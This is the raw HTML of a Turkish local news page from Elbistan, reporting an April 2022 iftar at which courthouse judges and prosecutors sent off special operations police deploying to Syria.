<a href="https://www.elbistaninsesi.com/secim-sonucu/7-haziran-2015-25-donem-milletvekili-genel-secimi-h30737.html" title="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2015-Genel-Secim-Sonuclari_297.jpg" alt="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi" />
7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi</a>
</div>
</div><div class="kathab"></div></div><div class="katelement kat_k17">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/kahramanmaras/kmtso-baskani-zabun-ktm-tekstil-ve-moda-yolculuguna-yeni-bir-ivme-kazandiracak-h38463.html" title="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/kmtso_baskani_zabun_ktm_tekstil_ve_moda_yolculuguna_yeni_bir_ivme_kazandiracak.jpg" alt="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”" />
KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/kahramanmaras/minikler-kizilderililerin-sira-disi-dunyasini-kesfedecek-h38435.html" title="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek" />
Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/kahramanmaras/ogrenciler-hedefi-12den-vurmak-icin-yaristi-h38434.html" title="Öğrenciler hedefi 12’den vurmak için yarıştı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/ogrenciler_hedefi_12den_vurmak_icin_yaristi.jpg" alt="Öğrenciler hedefi 12’den vurmak için yarıştı" />
Öğrenciler hedefi 12’den vurmak için yarıştı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/kahramanmaras/piazzada-indirim-yarisi-h35825.html" title="Piazza’da indirim yarışı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2016/08/piazzada_indirim_yarisi.jpg" alt="Piazza’da indirim yarışı" />
Piazza’da indirim yarışı</a>
</div>
</div></div> </div>
  </div>
  
</div>
          </div>
    
    <div id="mainContainer" class="container center  shadow" style="padding-top:20px;">

            <div class="page-header-fixed style hide">
        <div class="container center">
        <div class="title"></div>
        <div class="pull-right">          <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span>          <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a>
          <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a>
        </div>
        </div>
      </div>
      
      
      
      
<div class="reklam-fluid reklam reklam106"><a href="https://www.elbistaninsesi.com/banner.php?id=136" target="_blank" rel="nofollow"><img src="https://www.elbistaninsesi.com/thumb.php?src=https://www.elbistaninsesi.com/images/banner/Yaşam-Hastanesi-980.jpg&w=980&h=250&q=80" width="980" height="250" style="width:980px;height: 250px;border:0" alt="banner136" class="img-responsive"/></a></div>
<div id="ustmanset" class="fluid ustmanset  ustmanset5">
    <div class="span">
    <a href="https://www.elbistaninsesi.com/guncel/kuzey-ilceleri-yatirim-degerlendirme-toplantisi-elbistanda-yapildi-h73414.html" title="Kuzey İlçeleri Yatırım Değerlendirme Toplantısı Elbistan’da yapıldı" >
      <img src="https://www.elbistaninsesi.com/images/haberler/ustmanset/2022/04/yatırım-değerlendirme-toplantısı-1.jpg" alt="Kuzey İlçeleri Yatırım Değerlendirme Toplantısı Elbistan’da yapıldı" />
      <div class="caption">Kuzey İlçeleri Yatırım Değerlendirme Toplantısı...</div>    </a>
  </div>
    <div class="span">
    <a href="https://www.elbistaninsesi.com/guncel/oztunc-tan-toplantiya-davet-edilmeme-tepkisi-h73413.html" title="Öztunç&#039;tan toplantıya davet edilmeme tepkisi" >
      <img src="https://www.elbistaninsesi.com/images/haberler/ustmanset/2022/04/oztunc-tepki.jpg" alt="Öztunç&#039;tan toplantıya davet edilmeme tepkisi" />
      <div class="caption">Öztunç'tan toplantıya davet edilmeme tepkisi</div>    </a>
  </div>
    <div class="span">
    <a href="https://www.elbistaninsesi.com/guncel/hakim-ve-savcilar-suriye-ye-giden-poh-leri-ugurladi-h73412.html" title="Hakim ve savcılar, Suriye&#039;ye giden PÖH&#039;leri uğurladı" >
      <img src="https://www.elbistaninsesi.com/images/haberler/ustmanset/2022/04/hakim-ve-savcılar-pohler-yemek-1.jpg" alt="Hakim ve savcılar, Suriye&#039;ye giden PÖH&#039;leri uğurladı" />
      <div class="caption">Hakim ve savcılar, Suriye'ye giden...</div>    </a>
  </div>
    <div class="span">
    <a href="https://www.elbistaninsesi.com/guncel/kent-konseyi-stklarla-iftarda-bulustu-h73406.html" title="Kent Konseyi, STK’larla iftarda buluştu" >
      <img src="https://www.elbistaninsesi.com/images/haberler/ustmanset/2022/04/kent-konseyi-iftar-4.jpg" alt="Kent Konseyi, STK’larla iftarda buluştu" />
      <div class="caption">Kent Konseyi, STK’larla iftarda buluştu</div>    </a>
  </div>
    <div class="span">
    <a href="https://www.elbistaninsesi.com/guncel/demirden-bagimlilikla-mucadelede-azim-ve-kararlilik-vurgusu-h73394.html" title="Demir’den bağımlılıkla mücadelede azim ve kararlılık vurgusu" >
      <img src="https://www.elbistaninsesi.com/images/haberler/ustmanset/2022/04/bağımlılıkla-mucadele-1.jpg" alt="Demir’den bağımlılıkla mücadelede azim ve kararlılık vurgusu" />
      <div class="caption">Demir’den bağımlılıkla mücadelede azim ve...</div>    </a>
  </div>
  </div>
<!-- Üst Manşet -->

<div class="reklam-fluid reklam reklam109"><a href="https://www.elbistaninsesi.com/banner.php?id=191" target="_blank" rel="nofollow"><img src="https://www.elbistaninsesi.com/images/banner/kentpark-ramazan-980_1.gif" width="980" height="201" style="width:980px;height: 201px;border:0" alt="banner191" class="img-responsive"/></a></div>

      
      <!-- MAIN -->

      
      
      
      
      <div class="row">

        
        <!-- Sol Blok -->
        <div id="main" class="span8">
          <div class="reklam reklam129"><a href="https://www.elbistaninsesi.com/banner.php?id=162" target="_blank" rel="nofollow"><img src="https://www.elbistaninsesi.com/images/banner/balıkcı.gif" width="600" height="300" style="width:600px;height: 300px;border:0" alt="banner162" class="img-responsive"/></a></div>
<article id="haber">

    
    
          <div class="page-header clearfix">
        <h1 class="title gs-title" itemprop="name">Hakim ve savcılar, Suriye&#039;ye giden PÖH&#039;leri uğurladı</h1>
                <h2 class="lead" itemprop="description"><strong>Suriye&#039;deki operasyonlarda görev alacak özel harekat polislerine (PÖH), Elbistan Adliyesinde görev yapan hakim ve savcılar tarafından iftar programı düzenlendi.</strong></h2>
      </div>
    
            <div class="clearfix muted">
        <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2022-04-09 17:29:32" content="2022-04-09T17:29:32+02:00">09 Nisan 2022 Cumartesi 17:29</span></p>
              </div>
      
              <div class="clearfix newspic">
      <span>
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/04/hakim_ve_savcilar_suriye_ye_giden_poh_leri_ugurladi_h73412_e0327.jpg" alt="Hakim ve savcılar, Suriye&#039;ye giden PÖH&#039;leri uğurladı" itemprop="image"/>
      </span>
    </div>
    <div class="clearfix page-social">
        <div class="shr">
        <div id="paylas" class="hs-paylas paylas-haber-73412"></div>        </div>
        <div class="karakterislem secilemez pull-right">
          <i class="glyphicons-icon text_smaller"></i>
          <i class="glyphicons-icon text_bigger"></i>
          <i class="glyphicons-icon font"></i>
          <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a>
        </div>
    </div>
      

  <div id="newstext" class="clearfix page-content">
    
                <div class="reklam reklam134 text-center"><a href="https://www.elbistaninsesi.com/banner.php?id=167" target="_blank" rel="nofollow"><img src="https://www.elbistaninsesi.com/images/banner/hunkar.gif" width="600" height="300" style="width:600px;height: 300px;border:0" alt="banner167" class="img-responsive"/></a></div>        <div itemprop="articleBody" id="newsbody"><p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif">Programa, Elbistan Cumhuriyet Başsavcısı Hayri Ormancı, Elbistan İlçe Emniyet Müdürü Mehmet Ali Kayhan, adliyede görevli <strong class="klink">hakim ve savcılar</strong> ile PÖH timi personelleri katıldı.</span></span></p>

<p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif">Burada bir değerlendirme yapan Başsavcı Hayri Ormancı, Türk Polis Teşkilatının kuruluşunun 177.yıl dönümü olduğunu hatırlattı.</span></span></p>

<p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif">Başta Elbistan İlçe Emniyet Müdürlüğünde görev yapan polisler olmak üzere tüm teşkilatın  bu anlamlı haftasını kutladı.</span></span></p>

<p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif">Türk Polis Teşkilatının, şan ve şeref dolu bir tarihe sahip olduğunu dile getiren Başsavcı Ormancı, "Bu akşam, hem Türk Polis Teşkilatının kuruluşunun 177.yıl dönümü hem de Suriye'ye görevlendirilen özel harekat polislerimizi uğurlama adına adliyemiz hakim ve savcılarıyla birlikte bir program düzenlemek istedik. Suriye'de terör örgütlerine karşı görev yapacak olan PÖH'lerimize başarılar diliyoruz.  Allah yardımcıları olsun. Dualarımız onlarla.</span></span></p>

<p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif">Bu duygularla toplumsal huzurun teminatı olan başta Elbistan İlçe Emniyet Müdürlüğü mensupları olmak üzere tüm polis teşkilatımızın Polis Haftasını kutluyorum. Görevlerini yerine getirirken şehit olan polislerimizi minnet ve rahmetle anıyor, gazi polislerimize şükranlarımı sunuyor, görevi başında bulunanlara ve emekli olanlara aileleriyle birlikte sağlık, başarı ve mutluluklar diliyorum" dedi.</span></span></p>

<p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif">Elbistan İlçe Emniyet Müdürü Mehmet Ali Kayhan da nazik daveti ve düşüncelerinden dolayı Başsavcı Hayri Ormancı nezdinde tüm hakim ve savcılara teşekkür etti.</span></span></p><div class="p_ad"></div>

<p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif"><img class="detayFoto" src="https://www.elbistaninsesi.com/images/upload/001_257.jpg"></img></span></span></p>

<p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif"><img class="detayFoto" src="https://www.elbistaninsesi.com/images/upload/002_302.jpg"></img></span></span></p>

<p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif"><img class="detayFoto" src="https://www.elbistaninsesi.com/images/upload/003_273.jpg"></img></span></span></p></p></div>
                    
  
  </div>
  </article>

    <div class="hide-print">
    
<div id="anamanset" class="carousel carousel-nav hs-manset manset-standart modul-haber slid secilemez">

  <ol class="carousel-indicators twentyfive carousel-hover">

        <li class="hs-bgca active" onclick="window.location='https://www.elbistaninsesi.com/guncel/kuzey-ilceleri-yatirim-degerlendirme-toplantisi-elbistanda-yapildi-h73414.html'; return false;"  data-target="#anamanset" data-slide-to="0">1</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/oztunc-tan-toplantiya-davet-edilmeme-tepkisi-h73413.html'; return false;"  data-target="#anamanset" data-slide-to="1">2</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/hakim-ve-savcilar-suriye-ye-giden-poh-leri-ugurladi-h73412.html'; return false;"  data-target="#anamanset" data-slide-to="2">3</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/marleo-lenardit-ve-organik-tarim-topraklara-bereket-katacak-h73411.html'; return false;"  data-target="#anamanset" data-slide-to="3">4</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/kuyuya-dusen-tilki-kurtarildi-h73410.html'; return false;"  data-target="#anamanset" data-slide-to="4">5</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/kurak-avinda-yakalanan-sahsa-6-bin-lira-ceza-h73409.html'; return false;"  data-target="#anamanset" data-slide-to="5">6</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/malatyadaki-deprem-elbistanda-da-hissedildi-h73408.html'; return false;"  data-target="#anamanset" data-slide-to="6">7</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/konyali-hayirseverden-elbistandaki-ailelere-un-yardimi-h73407.html'; return false;"  data-target="#anamanset" data-slide-to="7">8</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/kent-konseyi-stklarla-iftarda-bulustu-h73406.html'; return false;"  data-target="#anamanset" data-slide-to="8">9</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/harcliklari-ile-ihtiyac-sahiplerinin-yuzunu-guldurduler-h73405.html'; return false;"  data-target="#anamanset" data-slide-to="9">10</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/eczanelerin-kapanis-saatleri-degisiyor-h73404.html'; return false;"  data-target="#anamanset" data-slide-to="10">11</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/alti-nokta-korler-derneginden-yardim-talebi-h73397.html'; return false;"  data-target="#anamanset" data-slide-to="11">12</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/25-yasindaki-genc-canina-kiydi-h73396.html'; return false;"  data-target="#anamanset" data-slide-to="12">13</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/baskan-bolukbasi-yeni-donemle-ilgili-degerlendirmelerde-bulundu-h73395.html'; return false;"  data-target="#anamanset" data-slide-to="13">14</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/demirden-bagimlilikla-mucadelede-azim-ve-kararlilik-vurgusu-h73394.html'; return false;"  data-target="#anamanset" data-slide-to="14">15</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/okullarda-ikinci-ara-tatil-basladi-h73393.html'; return false;"  data-target="#anamanset" data-slide-to="15">16</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/akcul-turkiye-komurunun-yuzde-15i-collolarda-uretilecek-h73391.html'; return false;"  data-target="#anamanset" data-slide-to="16">17</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/sehit-kabirlerine-ziyaret-h73390.html'; return false;"  data-target="#anamanset" data-slide-to="17">18</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/kavaklidan-ogrencilere-basari-ve-motivasyon-konferansi-h73389.html'; return false;"  data-target="#anamanset" data-slide-to="18">19</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/orman-bolge-mudurlugu-100-gecici-isci-alacak-h73388.html'; return false;"  data-target="#anamanset" data-slide-to="19">20</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/maden-iste-adil-bolukbasi-4doneme-merhaba-dedi-h73387.html'; return false;"  data-target="#anamanset" data-slide-to="20">21</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/otomobille-kamyonet-carpisti-2-yarali-2-h73386.html'; return false;"  data-target="#anamanset" data-slide-to="21">22</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/fore-kazik-uygulamasi-1-milyon-958-bin-liraya-mal-olacak-h73383.html'; return false;"  data-target="#anamanset" data-slide-to="22">23</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/polisler-kan-bagisinda-bulundu-2-h73382.html'; return false;"  data-target="#anamanset" data-slide-to="23">24</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/hoca-ahmet-yesevi-ilkokulundan-e-twinning-projesi-h73381.html'; return false;"  data-target="#anamanset" data-slide-to="24">25</li>
    
      </ol>

  <div class="carousel-inner">

        <div class="item active">
      <a href="https://www.elbistaninsesi.com/guncel/kuzey-ilceleri-yatirim-degerlendirme-toplantisi-elbistanda-yapildi-h73414.html" title="Kuzey İlçeleri Yatırım Değerlendirme Toplantısı Elbistan’da yapıldı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/04/kuzey_ilceleri_yatirim_degerlendirme_toplantisi_elbistanda_yapildi_h73414_c7388.JPG" alt="Kuzey İlçeleri Yatırım Değerlendirme Toplantısı Elbistan’da yapıldı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kuzey İlçeleri Yatırım Değerlendirme Toplantısı Elbistan’da yapıldı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/oztunc-tan-toplantiya-davet-edilmeme-tepkisi-h73413.html" title="Öztunç&#039;tan toplantıya davet edilmeme tepkisi">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/04/oztunc_tan_toplantiya_davet_edilmeme_tepkisi_h73413_c0661.jpg" alt="Öztunç&#039;tan toplantıya davet edilmeme tepkisi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Öztunç&#039;tan toplantıya davet edilmeme tepkisi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/hakim-ve-savcilar-suriye-ye-giden-poh-leri-ugurladi-h73412.html" title="Hakim ve savcılar, Suriye&#039;ye giden PÖH&#039;leri uğurladı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/04/hakim_ve_savcilar_suriye_ye_giden_poh_leri_ugurladi_h73412_e0327.jpg" alt="Hakim ve savcılar, Suriye&#039;ye giden PÖH&#039;leri uğurladı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Hakim ve savcılar, Suriye&#039;ye giden PÖH&#039;leri uğurladı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/marleo-lenardit-ve-organik-tarim-topraklara-bereket-katacak-h73411.html" title="Marleo Lenardit ve Organik Tarım, topraklara bereket katacak">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/04/marleo_lenardit_ve_organik_tarim_topraklara_bereket_katacak_h73411_f7a65.JPG" alt="Marleo Lenardit ve Organik Tarım, topraklara bereket katacak" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Marleo Lenardit ve Organik Tarım, topraklara bereket katacak</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/kuyuya-dusen-tilki-kurtarildi-h73410.html" title="Kuyuya düşen tilki kurtarıldı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/04/kuyuya_dusen_tilki_kurtarildi_h73410_0302e.jpg" alt="Kuyuya düşen tilki kurtarıldı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kuyuya düşen tilki kurtarıldı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/kurak-avinda-yakalanan-sahsa-6-bin-lira-ceza-h73409.html" title="Kurak avında yakalanan şahsa 6 bin lira ceza">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/04/kurak_avinda_yakalanan_sahsa_6_bin_lira_ceza_h73409_803ad.jpg" alt="Kurak avında yakalanan şahsa 6 bin lira ceza" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kurak avında yakalanan şahsa 6 bin lira ceza</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/malatyadaki-deprem-elbistanda-da-hissedildi-h73408.html" title="Malatya’daki deprem, Elbistan’da da hissedildi">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/04/malatyadaki_deprem_elbistanda_da_hissedildi_h73408_4f142.jpg" alt="Malatya’daki deprem, Elbistan’da da hissedildi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Malatya’daki deprem, Elbistan’da da hissedildi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/konyali-hayirseverden-elbistandaki-ailelere-un-yardimi-h73407.html" title="Konyalı hayırseverden Elbistan’daki ailelere un yardımı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/04/konyali_hayirseverden_elbistandaki_ailelere_un_yardimi_h73407_9c7e6.jpg" alt="Konyalı hayırseverden Elbistan’daki ailelere un yardımı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Konyalı hayırseverden Elbistan’daki ailelere un yardımı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/kent-konseyi-stklarla-iftarda-bulustu-h73406.html" title="Kent Konseyi, STK’larla iftarda buluştu">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/04/kent_konseyi_stklarla_iftarda_bulustu_h73406_458c5.jpg" alt="Kent Konseyi, STK’larla iftarda buluştu" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kent Konseyi, STK’larla iftarda buluştu</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/harcliklari-ile-ihtiyac-sahiplerinin-yuzunu-guldurduler-h73405.html" title="Harçlıkları ile ihtiyaç sahiplerinin yüzünü güldürdüler">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/04/harcliklari_ile_ihtiyac_sahiplerinin_yuzunu_guldurduler_h73405_faaa8.jpg" alt="Harçlıkları ile ihtiyaç sahiplerinin yüzünü güldürdüler" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Harçlıkları ile ihtiyaç sahiplerinin yüzünü güldürdüler</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/eczanelerin-kapanis-saatleri-degisiyor-h73404.html" title="Eczanelerin kapanış saatleri değişiyor">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/04/eczanelerin_kapanis_saatleri_degisiyor_h73404_55a82.jpg" alt="Eczanelerin kapanış saatleri değişiyor" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Eczanelerin kapanış saatleri değişiyor</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/alti-nokta-korler-derneginden-yardim-talebi-h73397.html" title="Altı Nokta Körler Derneği’nden yardım talebi">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/04/alti_nokta_korler_derneginden_yardim_talebi_h73397_c805a.jpg" alt="Altı Nokta Körler Derneği’nden yardım talebi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Altı Nokta Körler Derneği’nden yardım talebi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/25-yasindaki-genc-canina-kiydi-h73396.html" title="25 yaşındaki genç, canına kıydı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/04/25_yasindaki_genc_canina_kiydi_h73396_7d36c.jpg" alt="25 yaşındaki genç, canına kıydı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">25 yaşındaki genç, canına kıydı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/baskan-bolukbasi-yeni-donemle-ilgili-degerlendirmelerde-bulundu-h73395.html" title="Başkan Bölükbaşı, yeni dönemle ilgili değerlendirmelerde bulundu">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/04/baskan_bolukbasi_yeni_donemle_ilgili_degerlendirmelerde_bulundu_h73395_8402f.JPG" alt="Başkan Bölükbaşı, yeni dönemle ilgili değerlendirmelerde bulundu" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Başkan Bölükbaşı, yeni dönemle ilgili değerlendirmelerde bulundu</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/demirden-bagimlilikla-mucadelede-azim-ve-kararlilik-vurgusu-h73394.html" title="Demir’den bağımlılıkla mücadelede azim ve kararlılık vurgusu">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/04/demirden_bagimlilikla_mucadelede_azim_ve_kararlilik_vurgusu_h73394_4f5f4.jpg" alt="Demir’den bağımlılıkla mücadelede azim ve kararlılık vurgusu" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Demir’den bağımlılıkla mücadelede azim ve kararlılık vurgusu</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/okullarda-ikinci-ara-tatil-basladi-h73393.html" title="Okullarda ikinci ara tatil başladı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/04/okullarda_ikinci_ara_tatil_basladi_h73393_e7947.jpg" alt="Okullarda ikinci ara tatil başladı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Okullarda ikinci ara tatil başladı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/akcul-turkiye-komurunun-yuzde-15i-collolarda-uretilecek-h73391.html" title="Akçul: “Türkiye kömürünün yüzde 15’i Çöllolar’da üretilecek”">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/04/akcul_turkiye_komurunun_yuzde_15i_collolarda_uretilecek_h73391_6edc2.JPG" alt="Akçul: “Türkiye kömürünün yüzde 15’i Çöllolar’da üretilecek”" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Akçul: “Türkiye kömürünün yüzde 15’i Çöllolar’da üretilecek”</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/sehit-kabirlerine-ziyaret-h73390.html" title="Şehit kabirlerine ziyaret">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/04/sehit_kabirlerine_ziyaret_h73390_f0098.JPG" alt="Şehit kabirlerine ziyaret" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Şehit kabirlerine ziyaret</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/kavaklidan-ogrencilere-basari-ve-motivasyon-konferansi-h73389.html" title="Kavaklı’dan öğrencilere başarı ve motivasyon konferansı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/04/kavaklidan_ogrencilere_basari_ve_motivasyon_konferansi_h73389_16c16.JPG" alt="Kavaklı’dan öğrencilere başarı ve motivasyon konferansı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kavaklı’dan öğrencilere başarı ve motivasyon konferansı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/orman-bolge-mudurlugu-100-gecici-isci-alacak-h73388.html" title="Orman Bölge Müdürlüğü 100 geçici işçi alacak">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/04/orman_bolge_mudurlugu_100_gecici_isci_alacak_h73388_f20c0.jpeg" alt="Orman Bölge Müdürlüğü 100 geçici işçi alacak" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Orman Bölge Müdürlüğü 100 geçici işçi alacak</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/maden-iste-adil-bolukbasi-4doneme-merhaba-dedi-h73387.html" title="Maden İş’te Adil Bölükbaşı 4.döneme ‘merhaba’ dedi">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/04/maden_iste_adil_bolukbasi_4doneme_merhaba_dedi_h73387_1f971.jpg" alt="Maden İş’te Adil Bölükbaşı 4.döneme ‘merhaba’ dedi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Maden İş’te Adil Bölükbaşı 4.döneme ‘merhaba’ dedi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/otomobille-kamyonet-carpisti-2-yarali-2-h73386.html" title="Otomobille kamyonet çarpıştı: 2 yaralı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/04/otomobille_kamyonet_carpisti_2_yarali_h73386_879f7.jpg" alt="Otomobille kamyonet çarpıştı: 2 yaralı" />

                <div class="carousel-caption">

          
                    <h2>
